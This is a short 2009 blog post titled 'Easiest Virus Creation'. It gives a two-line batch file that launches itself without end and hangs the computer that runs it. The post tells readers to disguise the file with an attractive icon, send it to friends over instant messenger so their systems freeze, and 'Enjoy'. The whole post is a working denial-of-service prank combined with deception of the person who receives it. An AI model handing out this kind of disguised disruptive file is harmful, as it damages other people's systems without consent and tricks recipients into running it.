Thursday, January 1, 2009

Easiest Virus Creation

Easiest Virus Creation :

[How to] use batch file to hang your friends' computer:

Open notepad and type in the following commands:

start

filename.bat

and

save it as filename.bat

Remember that both the filename should be the same.

For instance:

start

pradeep.bat

and

save as pradeep.bat

Do not forget to diguise it with a nice looking icon..

How to Implement:

Just create a batch file with this command and send it to your friend via gtalk or yahoo messenger. When he opens the file then his system hangs.

How It Works: When one opens the batch file, it so happens that an infinite loop is created and the batch file is executed infinitely.Hence the processor is totally engaged in carrying out the batch file and hence no other process is allowed to carry out.Thus his system hangs

....Enjoy

No comments: